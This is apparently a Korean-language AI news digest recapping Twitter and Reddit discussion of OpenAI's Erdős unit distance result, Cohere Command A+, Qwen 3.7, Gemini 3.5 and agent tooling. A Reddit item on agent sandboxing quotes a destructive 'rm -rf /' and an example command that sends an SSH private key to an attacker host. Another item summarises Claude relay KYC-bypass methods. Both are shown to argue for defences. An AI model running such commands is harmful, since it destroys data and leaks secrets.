OpenAI 모델, Erdős 단위거리 문제에서 수학적 돌파

헤드라인: OpenAI 모델, Erdős 단위거리 문제에서 수학적 돌파

참고 링크: 544 Twitters, AINews’ website, AINews is now a section of Latent Space, opt in/out

OpenAI의 범용 추론(reasoning) 모델이 1946년 Erdős가 제기한 평면 단위거리 문제에서 오래된 믿음을 반박하는 새로운 구성군을 발견했다. 이는 올림피아드형 수학 문제 풀이를 넘어, 공개 수학 난제에 기여한 사례로 평가되며 장기 추론(long-horizon reasoning)이 과학 연구에 미칠 가능성을 보여준다.

AI Twitter Recap

OpenAI의 Erdős 단위거리 문제 수학 돌파

범용 추론 모델이 이산기하학에서 새 연구 결과를 냈다: OpenAI는 내부 모델이 1946년의 유명한 Erdős 문제인 평면 **단위거리 문제(unit distance problem)**에 관한 오래된 믿음을 반박하고, 정사각 격자식 해법을 개선하는 새로운 구성군을 발견했다고 발표했다 @OpenAI. OpenAI는 이것이 도메인 특화 수학 시스템이나 스캐폴딩된 풀이기가 아니라 범용 모델이었다고 강조했으며 @OpenAI, 이 결과가 과학 전반을 위한 더 강한 장기 추론을 시사한다고 밝혔다 @OpenAI.
수학자와 인접 연구자들의 검증 반응도 이례적으로 강했다: Timothy Gowers는 이를 AI가 잘 알려진 공개 수학 문제를 푼 첫 번째 정말 명확한 사례라고 평가했고 @wtgowers, OpenAI 연구자 Hongxun Wu는 이를 “가장 어려운 문제들”에 관한 내부 추론 LLM의 이정표라고 설명했다 @HongxunWu. @thomasfbloom, @gdb, @alexwei_, @polynoamial의 추가 반응도 같은 지점으로 모였다. 이는 이전의 “AI가 올림피아드 수학을 푼다”는 이정표를 질적으로 넘어선 것으로 보인다는 것이다.
주목할 기술적 맥락: OpenAI는 이 모델이 한계까지 밀어붙여진 것이 아니며, 결국 공개 사용을 목표로 한다고 밝혔다 @polynoamial. 공개된 추론 요약 자체도 약 125페이지에 달하는 것으로 알려졌고 @voooooogel, 이는 프런티어 추론에서 **테스트 타임 컴퓨트(test-time compute)**의 실제 역할에 관한 논의를 촉발했다. 일부 관찰자들은 이를 추론 시점 스케일링(inference-time scaling)이 현재 진전을 이끄는 패러다임이라는 추가 증거로 해석했고 @arohan, 다른 이들은 형식 과학과 수학에서 향후 더 빠른 성과를 예상했다 @scaling01, @sama.

Cohere Command A+ 공개 릴리스와 아키텍처 논의

Cohere가 Command A+를 Apache 2.0 오픈 웨이트로 공개했다: Cohere는 이를 지금까지 가장 강력한 모델로 포지셔닝하면서 낮은 하드웨어 요구사항에 명시적으로 최적화했다고 밝혔다 @cohere. 라이선스는 후속 게시물에서 명확히 설명했다 @cohere. 이 릴리스가 중요한 이유 중 하나는 Cohere의 첫 완전 공개 Apache 2 모델이기 때문이다 @aidangomez. 커뮤니티 반응은 이를 더 관대한 라이선스와 배포 가능한 엔터프라이즈급 오픈 모델로 향하는 의미 있는 전환으로 보았다 @nickfrosst, @ClementDelangue.
모델 세부사항은 여러 게시물에서 반복됐다: 대략 218B MoE / 25B 활성, 멀티모달, 48개 언어, 비교적 적은 장비에서도 실행 가능하다는 점이다 @JayAlammar, @mervenoyann. vLLM day-0 지원도 빠르게 제공됐으며, W4A4에서 2× H100만으로도 실행 가능하다는 언급이 포함됐다 @vllm_project.
벤치마크는 엇갈리지만 신뢰할 만한 그림을 그렸다: Artificial Analysis는 Command A+를 Intelligence Index 37점으로 평가해 Claude 4.5 Haiku 수준에 놓았고, 특히 강한 비환각(non-hallucination) 성향과 괜찮은 속도를 보였지만 최상위 경쟁 모델보다 과학적 추론과 코딩은 약하다고 평가했다 @ArtificialAnlys. 커뮤니티는 아키텍처도 파고들었다. 특이한 선택으로는 병렬 트랜스포머 블록, 큰 공유 전문가(shared expert) 사용, RMSNorm 대신 LayerNorm, 비교적 얕은 32층 깊이, 비전형적인 헤드/전문가 구성이 언급됐다 @eliebakouch, @rasbt, @stochasticchasm. 이로 인해 이번 릴리스는 단순한 모델 공개를 넘어 아키텍처 데이터 포인트로도 주목받았다.

에이전트, 메모리, 과학 워크플로 벤치마크

InferenceBench는 이날 가장 기술적으로 실질적인 릴리스 중 하나다. 이는 개방형 추론 최적화 작업을 통해 AI R&D 자동화를 겨냥하며, 현재 프런티어 에이전트에 대한 핵심 결론은 부정적이다. 이들은 시스템 수준 엔지니어링, 의존성 관리, 폭넓은 탐색에 어려움을 겪고, 단순한 vLLM/SGLang 하이퍼파라미터 튜닝 기준선보다 낮은 성과를 보였다 @maksym_andr. 이 스레드는 Claude Sonnet 4.6과 GLM-5 같은 모델이 견고한 최종 상태를 유지해 좋은 순위를 얻는 반면, 더 큰 모델들은 종종 취약한 최종 구성을 만든다는 명백한 역스케일링(inverse scaling) 효과도 보고했다.
Terminal-Bench Science는 에이전트 평가를 코딩에서 실제 과학 워크플로로 확장하며, 과제 기여가 공개됐다 @StevenDillmann. 동시에 MINTEval은 잦은 업데이트와 간섭이 있는 장문 컨텍스트 메모리 시스템을 겨냥한다. 평균 인스턴스 길이는 138.8k 토큰, 최대 1.8M에 이르지만, 7개 시스템의 평균 정확도는 **27.9%**에 불과했고 최고도 **33.4%**였다 @hyunji_amy_lee. 이는 메모리가 단순한 RAG/컨텍스트 채우기가 아니라 전용 학습 서브시스템이어야 한다는 작업 흐름과 맞닿아 있다 @dair_ai.
인간 상호작용 연구 측면에서는 ThoughtTrace가 실제 LLM 대화 중 사용자의 **자기보고 생각(self-reported thoughts)**에 관한 대규모 데이터셋을 공개했다. 규모는 10,174개 생각 주석, 2,155개 멀티턴 대화, 1,058명 사용자, 20개 모델이다. 보고된 향상은 사용자 행동 예측 +41.7%, 정렬(alignment) **+25.6%**였다 @chuanyang_jin. 이는 대화 로그만으로 놓치기 쉬운 “잠재 사용자 상태(latent user state)”를 측정하려는 더 구체적인 시도 중 하나다.

Google I/O 후속: Gemini 3.5 Flash, Omni, AI Studio, Antigravity

Gemini 3.5 Flash가 Gemini 앱에서 더 넓게 출시되기 시작했으며, 전 세계 무료 접근도 포함됐다 @GeminiApp, @GeminiApp. Google은 이를 지금까지 가장 강한 에이전틱(agentic) 및 코딩 모델로 설명하며, 비교 가능한 모델 대비 4배 속도와 절반 이하 비용으로 프런티어 성능을 낸다고 주장했다 @Google. 그러나 외부 논의는 훨씬 엇갈렸고, 유리한 출시 단계 벤치마크 포지셔닝에도 불구하고 실사용 비용/성능과 토큰 효율성을 의심하는 게시물이 여럿 나왔다 @ArtificialAnlys, @scaling01, @giffmana.
Gemini Omni는 3.5 Flash보다 더 큰 질적 인상을 남긴 것으로 보인다. Google은 이를 비디오와 혼합 입력 워크플로를 위한 대화형 멀티모달 생성/편집 모델로 포지셔닝했고 @Google, Gemini 앱 데모는 대화형 비디오 편집을 보여줬다 @GeminiApp. 초기 반응은 대체로 Omni를 핵심 LLM 갱신보다 더 차별화된 제품으로 보았다 @scaling01.
툴링 측면에서는 AI Studio가 엔드투엔드 개발자 워크플로와 모바일 접근을 더 강하게 밀었다 @GoogleAIStudio. 여러 게시물은 Gemini Spark, Antigravity, Google의 내부/외부 에이전트 하네스 간 관계를 해독하려고 했다 @simonw, @_philschmid. 더 구체적인 Antigravity 인접 업데이트는 Google 에이전트 스택을 위한 Science Skills 출시로, UniProt과 AlphaFold DB 등 30개 이상의 생명과학 소스를 통합했다 @GoogleDeepMind.

에이전트 인프라, 검색, 개발 도구

여러 게시물이 같은 운영 교훈으로 수렴했다: 에이전트는 데모보다 먼저 인프라 현실에서 실패한다. 이 주제는 의존성 충돌과 설정을 상대하는 연구 에이전트에 관한 질적 스레드 @jehyeoky248, LangSmith Sandboxes GA를 향한 LangChain의 움직임 @LangChain, 순수 도구 실행과 완전한 샌드박스 사이의 중간 지점으로서 deepagents용 더 가벼운 code interpreter 지원 @sydneyrunkle, @hwchase17에서 나타났다.
검색/리트리벌 인프라에서는 Perplexity가 질의 인식(query-aware) 및 인용 보존(citation-preserving) 컨텍스트 압축 시스템을 프로덕션화했다고 설명했다. 이 시스템은 컨텍스트 토큰을 최대 70% 줄이면서 답변 품질을 높이고, SimpleQA에서 프런티어급 성능으로 50배 압축을 달성했다고 주장했다 @perplexity_ai. Weaviate 1.37은 RAG/에이전트를 위한 벡터 리트리벌 다양성을 개선하기 위해 MMR 재랭킹을 추가했고 @weaviate_io, SID-1은 RL로 학습된 에이전틱 검색 모델로 제시됐으며, 인용된 설정에서 RAG+rerank 대비 1.9배 재현율, 24배 속도, GPT-5.1 대비 99% 저렴한 비용을 주장했다 @turbopuffer.
Cursor, VS Code, Codex도 모두 주목할 워크플로 업데이트를 출시했다. Cursor는 에이전트 워크스페이스에 **자동화(automations)**를 추가했고 @cursor_ai, VS Code는 더 나은 마크다운/HTML 미리보기, 원격 세션 연속성, 유틸리티 모델 설정 가능성을 제공했다 @code, @pierceboggan. 모델 측면에서는 Composer 2.5가 코딩 에이전트에서 강한 모습을 보였고, 상위 Opus/GPT-5.5 계열보다 훨씬 낮은 비용으로 Artificial Analysis Coding Agent Index 62점을 기록했다 @ArtificialAnlys. OpenAI도 모바일용 Codex를 출시했다 @OpenAIDevs.

Top Tweets

OpenAI 수학 이정표: 단위거리 돌파에 관한 OpenAI의 발표는 과학적 새로움과 장기 추론에 대한 함의 양쪽에서 이 묶음 중 가장 중요한 기술 게시물이었다 @OpenAI.
Cohere Command A+ 공개 릴리스: 이날 가장 큰 모델 릴리스 이야기 중 하나였으며, 주된 이유는 Apache 2.0 라이선스와 특이한 아키텍처였다 @cohere.
Anthropic의 SpaceX/Colossus 컴퓨트 확장: Anthropic이 Colossus 2 용량을 확대하고 있는 것으로 알려졌다 @nottombrown. 후속 게시물들은 SpaceX 컴퓨트 계약의 가치를 2029년 5월까지 월 $1.25B로 평가한 신고 자료를 인용했다 @SemiAnalysis_.
Exa 투자 유치: Exa는 $250M Series C를 $2.2B 밸류에이션으로 유치했으며, 스스로를 에이전트를 위해 웹 데이터를 조직하는 검색 연구소로 명시적으로 포지셔닝했다 @ExaAILabs.

AI Reddit Recap

/r/LocalLlama + /r/localLLM

Qwen is cooking hard (Activity: 1292): **이미지는 Chujie Zheng이 **Qwen이 “cooking hard”**라고 암시하는 스크린샷으로, Qwen3.7 Preview가 Qwen3.7-Max-Preview와 Qwen3.7-Plus-Preview와 함께 Arena에 올라왔다는 발표를 인용한다. 게시물은 **Alibaba가 Text에서 #6, Vision에서 #5라고 주장한다. Reddit 제목과 본문 맥락상 사용자들은 더 크고 새로워진 오픈 웨이트 모델, 특히 122B와 새로운 27B를 기대하고 있지만, 스크린샷 자체는 기술 벤치마크 분석이라기보다 티저에 가깝다. Image 댓글은 고성능 모델에 대한 기대와 더 작은 로컬 모델에 대한 실용적 관심으로 갈렸다. 일부는 저사양 하드웨어를 위한 9B/4B 변형을 원했고, 다른 이들은 122B나 더 나은 35B를 기대하거나 Qwen이 곧 자신들의 GPU를 “cooking”할지도 모른다고 농담했다. 여러 댓글은 현재 27B 릴리스보다 모델 크기 커버리지에 집중했다. 실질적으로 실행할 수 없다고 말하며 저사양 또는 노트북 GPU용 Qwen 4B/9B 변형을 바랐고, 더 큰 **122B**와 개선된 35B 체크포인트에도 관심을 보였다. 다만 한 댓글은 Qwen 3.6 무렵 언급됐던 122B가 실제로 나오지 않았다는 점을 들어 Qwen 3.7 122B가 실제 출시될지 불확실하다고 했다.
Qwen3.7 Max scored by Artificial Analysis, 27B/35B waiting room (Activity: 553): **Reddit 게시물은 Qwen3.7 Max가 5위에 오른 Artificial Analysis 리더보드 스크린샷을 다룬다. 이는 대략 **GPT 5.4 (xhigh)와 비슷하고 Gemini 3.5 Flash보다 약간 앞선 수준이다. 작성자는 Qwen3.6 27B가 Max 대비 정확히 6점 뒤진다고 언급하며, 향후 Qwen3.7 27B/35B 변형이 Max 모델 성능에 가깝기를 바랐다. 댓글 작성자들은 주로 “오픈 웨이트 모델을 간절히 기다리는” 분위기였고, Max 모델이 오픈소스가 아니라는 우려에도 불구하고 Qwen 팀이 이제 주요 연구소들과 경쟁할 수 있다는 증거로 보았다. 한 기술적 우려는 Qwen이 이전의 “overthinking” 경향을 고쳤는지였다. 댓글은 Qwen3.7 Max가 진짜 아키텍처 업데이트인지, 아니면 Qwen3.5/Qwen3.6 아키텍처의 또 다른 미세조정(fine-tuning)/반복인지에 집중했다. 같은 기반 아키텍처에서 더 많은 성능을 끌어냈다면 그것도 기술적으로 주목할 만하다는 의견도 있었다. 여러 사용자는 잠재적 오픈 웨이트 27B/35B 변형을 기다렸지만, 한 댓글은 “Qwen 3.7”이 전체 공개 모델 패밀리가 아니라 Qwen 3.6 390B A30B와 비슷한 비공개 대형 모델일 수 있다며 Qwen 3.7 27B가 아예 없을 수도 있다고 추측했다. 또 다른 기술적 관심사는 Qwen 팀이 보고된 “overthinking” 동작을 해결했는지였고, 이는 단순 벤치마크 향상보다 추론 토큰 효율, 응답 지연, 제어 가능성 개선에 대한 관심을 뜻한다.
Qwen will release another 27B with high probability (Activity: 1162): **image는 X/Twitter 대화 스크린샷으로, xiong-hui (barry) chen이 Qwen이 *“정확한 로드맵을 기다리고 있다”*고 말하면서도 또 다른 27B 릴리스 가능성이 높다고 본다. Reddit 제목은 이를 평가가 좋았던 Qwen 3.6 27B의 유력한 후속으로 해석한다. 기술적 의미는 Qwen이 훨씬 큰 MoE 모델로만 스케일링하기보다 중간 크기 dense 모델 범위에서 **파라미터 효율 / “지능 밀도(intelligence density)”를 계속 최적화할 수 있다는 추측에 있다. 댓글은 주로 로컬 추론의 실용성을 논했다. 일부는 더 큰 122B-A10B MoE 모델을 원했고, 다른 이들은 27B가 16GB VRAM 사용자에게 너무 무겁다며 소비자용 게이밍 노트북이나 하이브리드 CPU/GPU 환경에서 실행 가능한 35B/A3B식 MoE를 선호했다. 댓글은 27B 모델 주변의 로컬 추론 격차도 논했다. 16GB VRAM 사용자는 27B 모델을 쓸 만한 양자화(quantization) 수준으로 실행하기 어렵다고 했고, 가상의 Qwen 35B MoE / A3B 스타일 모델이 하이브리드 CPU/GPU 추론을 통해 더 실용적일 수 있다고 봤다. 더 큰 dense Qwen 변형, 특히 50B80B에도 관심이 있었고, 한 댓글은 Qwen 27B가 MTP 덕분에 이미 매우 빠르다며 더 높은 파라미터 수와 잠재적 품질을 위해 일부 생성 속도를 희생할 수 있다고 했다. 모델 크기 요청은 MoE와 dense 스케일링 경로 양쪽으로 모였으며, 제안된 목표에는 Qwen 3.7 122B-A10B, 50B80B MoE, dense 10B, 20B, 30B, 50B, 80B 릴리스가 포함됐다.

오픈 모델 릴리스: Lance 3B와 Command A+

bytedance released an open source model that attempts to do just about anything with only 3b parameters (Activity: 830): ****ByteDance Research**는 이미지/비디오 이해, 텍스트-이미지/텍스트-비디오 생성, 이미지/비디오 편집을 지원한다고 홍보하는 네이티브 통합 멀티모달 모델 Lance를 공개했다. 이 모델은 **3B active parameters**를 내세우며, 128×A100 예산에서 단계적 멀티태스크 레시피로 처음부터 학습됐다. 댓글은 “3B active”가 실제 배포 크기를 축소해 보일 수 있다고 지적했다. HF 모델 카드는 ≥40GB VRAM을 요구하고, safetensors는 Lance_3B가 약 24.7GB, Lance_3B_Video가 약 **28.4GB다. 한 댓글은 이를 튜닝된 WAN 2.2 3B Video 모델, 3B 픽셀 공간 이미지 모델, VLM 백본으로서의 Qwen2.5-VL-3B를 결합한 BAGEL 스타일 복합 시스템으로 설명했다. 논의는 작은 활성 파라미터 수가 복잡한 장면에서도 품질을 유지할 수 있는지와, 공개된 Gradio 데모가 기본 T2V와 VQA만 다루고 VLM chat, T2I, 에이전트식 상호작용을 빠뜨렸다는 비판에 집중됐다. 한 댓글은 40GB 요구사항이 하위 모델을 필요할 때 로드/언로드하면 줄어들 수 있지만, 대신 지연 시간이 늘어날 수 있다고 봤다. 댓글은 이 릴리스가 단순한 dense 3B 모델이 아니라 3B active 파라미터라고 설명했다. 다운로드 가능한 safetensors는 훨씬 크고, 모델 카드는 추론에 최소 40GB VRAM GPU를 요구하므로, 광고된 활성 파라미터 외에 상당한 비활성/보조 가중치 또는 여러 상주 구성요소가 있음을 시사한다. 기술 분석은 이 모델을 BAGEL 아키텍처 기반 복합 시스템으로 설명했다. 공개 데모는 기술적으로 불완전하다는 비판도 받았다. Gradio 인터페이스가 기본 텍스트-비디오와 VQA만 지원하고, VLM chat, 텍스트-이미지, 에이전트식 상호작용 같은 시연 기능을 누락했다는 것이다.
Re. what ever happened to Cohere’s Command-A series of models? (Activity: 439): ****Cohere**는 첫 MoE 오픈 웨이트 모델인 **Command A+를 발표했다. 이는 순수한 최고 벤치마크 리더라기보다 고효율/저지연 엔터프라이즈 에이전트 모델로 포지셔닝됐다. Cohere는 1–2개 GPU에서 실용적 배포를 가능하게 하는 강한 양자화(quantization) 작업을 주장하며, 광범위한 상업적 사용을 위해 Apache 2.0으로 릴리스한다 (announcement, 공동창업자 Aidan의 이전 Reddit 맥락은 here). Nick Frosst는 이 릴리스를 커뮤니티 피드백의 영향을 받은 것으로, 소규모 팀과 개발자를 위한 실용적 에이전트 구축에 초점을 둔 Command/R 시리즈의 연장선으로 명시했다. 댓글은 Cohere가 경쟁력 있는 오픈 웨이트 릴리스로 돌아온 데 전반적으로 긍정적이었다. 한 댓글은 원래의 **Command R+**가 창의적 작업과 리소스 계획 워크플로에서 *“전설적”*이었다고 했다. 댓글의 주된 기술적 요청은 로컬 추론을 위한 GGUF 제공이었다. 한 댓글은 표준 벤치마크 보고나 현재 비슷한 크기의 SOTA 모델, 특히 MiniMax M2.7와 MiMo v2.5와의 비교가 없다는 이유로 새 Cohere Command-A 모델의 경쟁력을 의심했다. 여러 사용자는 새 릴리스를 원래의 **Command R+**와 비교했으며, Command R/R+를 매력적으로 만들었던 성질에서 멀어진 것 아니냐는 우려도 있었다. 로컬 추론 지원, 특히 GGUF 제공 요청도 있었다.

Claude 릴레이 남용과 에이전트 샌드박스 안전

I spent a week researching the Chinese “transfer station” economy reselling Claude at 10% of retail. The supply chain is wilder than I expected. (Activity: 1075): 이미지는 Claude/Anthropic API 접근권을 큰 폭의 할인으로 재판매하는 중국 “transfer station” 경제에 관한 X 기사 미리보기 스크린샷이다. 중국 AI 기업에서 미국 Claude 엔드포인트로 이어지는 “token smuggle / inference exfiltration” 지도로 묘사된다: image. 게시물의 기술적 주장은 이 릴레이들이 수집된 Anthropic 계정, 주거용 프록시, TLS 지문 스푸핑, SMS/SIM-bank 검증, KYC 우회, one-api, new-api, claude-relay-service, claude2api, clewdr, clove 같은 오픈소스 릴레이 스택을 이용해 여러 사용자를 pooled OAuth 토큰 위에 다중화한다는 것이다. 또한 인용된 CISPA Helmholtz 감사가 릴레이가 “Opus” 요청을 Haiku/GLM/Qwen으로 조용히 대체하면서 최대 47.21% 성능 저하와 45.83% 모델 지문 실패를 발견했고, 모든 프롬프트/응답이 증류 데이터셋으로 로깅될 수 있다는 품질/보안 위험도 강조했다. 댓글은 공급망 세부사항이 그럴듯하지만 우려스럽다고 봤으며, 특히 모델 대체와 KYC 우회 주장에 반응했다. 한 댓글은 감사 증거의 출처가 Anthropic인지, 내부 텔레메트리인지, 허니팟/가짜 고객 테스트인지 질문했고, 다른 댓글은 보조금이 붙은 토큰 가격이 끝나면 저렴한 추론이 사라질 수 있다고 주장했다. 한 댓글은 17개 릴레이 엔드포인트에 대한 CISPA Helmholtz 감사가 공식 API 대비 최대 47.21% 성능 저하와 45.83% 엔드포인트의 모델 지문 검증 실패를 찾았다는 게시물의 주장을 강조했다. 또 다른 댓글은 릴레이 감사 주장의 방법론을 질문했다. 자동 가짜 계정 생성과 다중 사용자 계정 공유, 그리고 모든 프롬프트와 대화가 재판매자의 데이터베이스에 기록될 수 있다는 운영 모델도 요약됐다.
got my first “rm -rf /” today (Activity: 614): 새로 구현한 Bash 명령 화이트리스트를 테스트하던 에이전트가 파괴적 명령 rm -rf / 실행을 시도했다. 차단은 성공해 파일시스템 손상은 막았지만, 작성자는 즉시 Bubblewrap (bwrap) 격리/샌드박싱을 추가했다. 작성자는 샌드박스보다 화이트리스트가 먼저 구현됐고, 에이전트가 유해 명령 필터를 검증하기 위해 rm -rf /를 선택했다고 설명했다. 한 댓글은 파일시스템 보호만으로 충분하지 않다고 지적했다. 에이전트가 Git 히스토리 재작성 같은 파괴적 버전관리 작업도 할 수 있으므로, 샌드박스 강화의 일부로 Git 설정과 권한도 검토해야 한다는 것이다. 또 다른 댓글은 샌드박싱이 파일 쓰기뿐 아니라 네트워크 이그레스도 제한해야 한다고 강조했다. rm -rf /를 막는 것만으로는 부족하며, 에이전트가 curl attacker.com -d "$(cat ~/.ssh/id_rsa)"로 비밀을 유출할 수 있다는 것이다. Docker --network=none이나 unshare --user --pid --mount --net --fork 같은 격리 방식이 제안됐다.

Less Technical Subreddits

Karpathy joins Anthropic (Activity: 6494): 이미지는 밈이 아니라, Andrej Karpathy가 교육 중심 작업을 나중으로 미루고 프런티어 LLM R&D로 돌아가기 위해 Anthropic에 합류했다고 말하는 X 게시물 스크린샷이다 (image). Reddit 제목 “Karpathy joins Anthropic”은 Karpathy가 딥러닝, LLM 교육, 산업 AI 연구에서 가졌던 위상을 고려할 때 이를 프런티어 모델 경쟁의 주요 인재 이동으로 해석한다. 댓글은 대체로 이를 기술 뉴스라기보다 AI 업계 드라마로 다뤘고, 슈퍼스타가 최강 팀에 합류하는 것에 비유하며 Anthropic이 현재 최고의 라인업 중 하나를 갖췄다고 암시했다. Sam Altman/OpenAI에 대한 부정적 농담도 있어, 댓글 작성자들이 이 이동을 경쟁적으로 중요하게 읽고 있음을 보여줬다.
Paid $118 for Claude Max, ignored by support for days. So I served a formal legal notice to Anthropic’s new India office. (Activity: 1901): **이미지는 비기술적으로, 게시자가 주장하는 $118 Claude Max 결제가 계정을 Free 티어 이상으로 활성화하지 못했다는 문제와 관련해 Anthropic India Private Limited 앞으로 보낸 인쇄된 **“LEGAL NOTICE”를 보여준다. 맥락상 이 게시물은 여러 봇 처리 티켓 이후에도 사람 지원을 받지 못한 결제/프로비저닝 실패를 주장하며, 이를 모델이나 API 문제가 아니라 소비자 보호 분쟁으로 묘사한다. Image 댓글은 법적 통지가 결과를 낼지 회의적이었고, 한 사용자는 *“무슨 일이든 생기면 업데이트해 달라. 안 생길 것이다.”*라고 말했다. 다른 이들은 Anthropic 미국 사무소로 통지를 보내라고 조언했고, 현대 AI/SaaS 기업들이 봇 뒤에서 인간 고객지원을 최소화한다고 비판했다. 한 상세 결제 실패 보고는 $100 Max 플랜을 사용 중이었음에도 375건의 설명되지 않은 Anthropic 청구, 총 약 $6,000이 발생했다고 설명했다. 청구는 약 $5에서 $23까지 다양했고 두 개의 Amex 카드에 걸쳐 발생했다. 댓글 작성자는 플랜 업그레이드 중 백엔드 상태 동기화 버그로 사용량이 유료 “추가 사용량”으로 잘못 처리됐을 가능성을 의심했지만, Claude billing, usage pages, API usage, auto top-up, account records 어디에도 청구가 나타나지 않아 사용자 측에서 대조가 불가능했다고 했다.
Google’s Antigravity 2.0 creates an operating system from scratch using 96 agents in 12 hours for under $1K in token costs - and it runs Doom (Activity: 2520): 게시물은 Google Antigravity 2.0이 96개 에이전트를 12시간 동안 조율해 토큰 비용 $1K 미만으로 처음부터 운영체제를 만들었고, 그 OS가 Doom을 실행할 수 있었다고 주장한다. Reddit 호스팅 비디오 링크(https://v.redd.it/19n7bckes42h1)는 403 Forbidden 응답으로 접근할 수 없었기 때문에, 구현 세부사항, 벤치마크, 아키텍처, 재현 가능한 증거는 원천에서 검증할 수 없었다. 댓글은 대부분 비기술적 농담이었지만, 한 댓글은 단일 에이전트가 한 시간도 안 돼 토큰 $100을 쓸 수 있다며 비용이 몇 자릿수 틀렸을 수 있다고 지적했다. 96 agents가 12 hours 동안 $1K 미만이라는 주장은 매우 저렴하거나 제한적인 모델, 공격적 컨텍스트 가지치기, 제약된 작업, 또는 상당한 컴퓨트/툴링 오버헤드 누락을 시사한다.
Extreme realism with Klein 9B distilled 2 loras together (Activity: 1716): **게시물은 Klein 9B Distilled / Flux2 Klein Base 9B가 여러 LoRA를 쌓아 비정상적으로 높은 포토리얼리즘을 달성한다고 주장한다. 조합은 Better Skin Concept 2.0 + Smartphone Snapshot Photo Reality v13.0 OMEGA이며, 선택적으로 SNof 1.3도 결합된다. 작성자는 모든 샘플이 순수 **텍스트-이미지(text-to-image)이고 편집/업스케일링 없음, RTX 3060 Ti 8GB에서 생성됐다고 말한다. 또한 Klein은 각각 weight 1.0인 LoRA 3개를 시각적 저하 없이 실행할 수 있지만, Z Image Turbo는 2개를 넘기거나 weight가 약 1.4를 넘으면 어려움을 겪는다고 주장한다. 댓글은 주로 현실감에 반응했으며, 일부 이미지를 보고 AI 생성인지 의심하게 됐다는 반응도 있었다. 다른 답글은 회의적/비판적으로 보였지만 추가 기술 세부사항은 없었다.
8 minutes of chatting with Pro and I’m at 100% usage with this new update. Is this a joke? Pro subscription btw (Activity: 1980): **모바일 스크린샷은 Google Gemini의 Pro “Usage limits” 페이지에서 사용자가 약 8분 채팅 후 현재 한도의 100%에 도달한 것을 보여준다. 별도 주간 한도는 5%만 사용된 것으로 표시되며, 페이지는 $409.99/month에 **“AI Pro보다 20배 더 많은 사용량”을 약속하는 상위 티어도 업셀한다 (image). 이 게시물은 소비자 LLM 제품에서 더 세분화되고 불투명한 할당량 집행이 늘어나는 사례로 기술적으로 관련이 있다. 이는 단순 주간 메시지 한도가 아니라 모델별, 시간창별, 또는 컴퓨트 비용 기반 스로틀링을 반영할 가능성이 높다. 댓글은 이를 Google이 Anthropic식 제한적 한도를 도입하는 것으로 해석했고, 제공자들이 추론(inference) 비용을 회수하려 하면서 유료 AI 구독이 더 공격적으로 계량되고 있다고 우려했다. 여러 사용자는 인프라 규모가 큰 Google조차 컴퓨트 제약을 겪거나 사용자를 매우 비싼 고사용량 플랜으로 밀어붙이는 것처럼 보인다는 점에 놀랐다. 사용자들은 Gemini Pro에서 심각한 할당량 축소를 보고했으며, 일부는 채팅 8분 만에 100% 사용량에 도달했다고 주장했고 다른 이는 주간 한도에 걸렸다고 했다. 가격도 주요 기술 접근성 문제로 떠올랐다. 사용자는 약 $6.99/month의 저가 Pro 구독과 $409.99/month로 언급된 훨씬 높은 AI 가격대를 비교하며, 고급 모델 접근이 널리 열리기보다 경제적으로 제한되고 있다고 주장했다.

AI Discord Recap

AI Discords

Discord 접근 종료: 유감스럽게도 Discord가 오늘 접근을 중단했다. 이 형식으로는 다시 가져오지 않을 예정이지만, 새 AINews를 곧 출시할 예정이다. 여기까지 읽어줘서 고맙고, 좋은 여정이었다.

오늘의 요약

헤드라인: OpenAI 모델, Erdős 단위거리 문제에서 수학적 돌파

AI Twitter Recap

OpenAI의 Erdős 단위거리 문제 수학 돌파

Cohere Command A+ 공개 릴리스와 아키텍처 논의

에이전트, 메모리, 과학 워크플로 벤치마크

Google I/O 후속: Gemini 3.5 Flash, Omni, AI Studio, Antigravity

에이전트 인프라, 검색, 개발 도구

Top Tweets

AI Reddit Recap

/r/LocalLlama + /r/localLLM

오픈 모델 릴리스: Lance 3B와 Command A+

Claude 릴레이 남용과 에이전트 샌드박스 안전

Less Technical Subreddits

AI Discord Recap

AI Discords